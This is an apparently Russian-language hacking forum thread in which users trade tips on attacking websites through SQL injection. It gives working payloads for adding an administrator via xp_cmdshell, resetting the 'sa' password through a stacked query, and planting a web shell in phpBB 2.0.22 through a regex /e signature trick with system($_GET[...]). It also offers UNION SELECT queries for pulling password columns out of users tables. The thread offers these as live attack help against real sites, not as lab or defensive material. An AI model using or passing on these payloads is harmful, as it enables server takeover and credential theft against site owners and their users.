2pinch нет от этого не зависеть
если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--

Это специфика браузера. Используй гхром, через него должно быть тру. Ну или как уже сказано выше, используй не браузер.

Как в phpBB 2.0.22 обойти usercp_avatar.php ??
не получаеться залить шел через аватарку. видно стоит обработка скриптом!

Или что можно воткнут в место phpinfo()
в
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbbhpinfo()' WHERE user_id=4;

штоб шел залить??

вставляй system($_GET[tu4ka])

есть таблица users

table_rows - 6

есть колонки name,pass

когда делаю запрос union+select+......version()+from+users то все нормально

а запрос union+select+......pass+from+users ничего не выдает

что посоветуете?

Konqi, попробуй shar() либо concat_ws()

Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users

count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?

чаром нельзя,а конкат не че не может изменить ибо это функция для соединения результатов,не больше.

budden, и что мне этот код даст?
он мне просто ошибку выдает...